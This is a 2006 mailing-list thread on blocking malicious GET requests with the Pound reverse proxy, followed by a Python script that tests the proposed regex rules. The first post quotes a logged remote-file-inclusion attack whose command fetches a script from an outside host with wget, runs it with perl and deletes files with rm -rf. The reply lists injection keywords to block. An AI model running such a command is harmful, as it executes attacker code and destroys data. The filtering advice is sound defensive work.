How to block based on GET pattern
Ivan Hernandez <ihernandez(at)cinemasoft.com.ar>
2006-01-27 17:42:10
I have received some attacks with patterns like this:

127.0.0.1 - - [27/Jan/2006:13:08:24 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sweet-serenity.org/tool25.txt?&cmd=cd%20/tmp/;wget%20http://sweet-serenity.org/xx.txt;perl%20xx.txt;rm%20-rf%20*? HTTP/1.0" 200 21310 "-" "Mozilla/5.0"

How can I block anything that says GLOBALS= ?
Thanks,
Ivan Hernandez
P.S.: Pound 1.8 on Debian Sarge

Re: How to block based on GET pattern
Adam Andrzej Jaworski <emaylx(at)gmail.com>
2006-01-29 22:37:53
Aloha!

>>>
>>> Ivan Hernandez <ihernandez(at)cinemasoft.com.ar> wrote:
>>> how can i block anything that says GLOBALS= ?
>>>

just use as first Service something like in this example (this is for 
Pound v2):

              # redirect all requests for forbidden urls part I
              Service
                  Url         "\?.*(onload|\.php.+src|delete.+from|insert.+into|select.+from|GLOBALS\=).*"
                  Redirect    "http://google.com"
              End
              # redirect all requests for forbidden urls part II
              Service
                  Url         "\?.*(iframe|script|document\.cookie).*"
                  Redirect    "http://google.com"
              End

this way you can also create full-size URL filtering similar to 
mod_security

HTH,
Adam
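
A way to check what the two Url patterns in the reply above would catch, and which legitimate requests they would also redirect, before deploying them (an added example, not part of the original thread or of Pound). Assumptions: Python's `re` stands in for Pound's regex matching, matching is unanchored and case-sensitive, and every sample URL is constructed for illustration.

```python
import re
from urllib.parse import unquote

# The two Url patterns from the Pound v2 example in the reply, copied verbatim.
FORBIDDEN = [
    r"\?.*(onload|\.php.+src|delete.+from|insert.+into|select.+from|GLOBALS\=).*",
    r"\?.*(iframe|script|document\.cookie).*",
]
COMPILED = [re.compile(p) for p in FORBIDDEN]


def blocked_by(url):
    """Return the index of the first pattern that matches url, or None.

    The thread does not say whether Pound decodes the URL before matching,
    so both the raw and the percent-decoded form are tested (assumption).
    """
    for form in (url, unquote(url)):
        for index, regex in enumerate(COMPILED):
            if regex.search(form):
                return index
    return None


# Constructed sample request URLs (not taken from real traffic).
SAMPLES = [
    # Shape of the request in the original post, with a placeholder host.
    "/index.php?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://example.invalid/x.txt",
    # Ordinary request to the same application: must pass.
    "/index.php?option=com_content&Itemid=1",
    # Legitimate searches that the broad alternatives also redirect.
    "/search?q=select+a+gift+from+the+list",
    "/docs?topic=javascript-basics",
    # Percent-encoded '=' is only caught after decoding.
    "/index.php?GLOBALS%3D1",
    # No query string, so neither pattern applies.
    "/files/GLOBALS=notes.txt",
]


def report(samples=SAMPLES):
    """Return (url, matching pattern index or None) for each sample."""
    return [(url, blocked_by(url)) for url in samples]


if __name__ == "__main__":
    for url, hit in report():
        verdict = "pass" if hit is None else f"redirect (pattern {hit + 1})"
        print(f"{verdict:22} {url}")
```

Running the patterns over a day of real access-log URLs in the same way shows how many legitimate requests would be redirected before the Service blocks go live.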
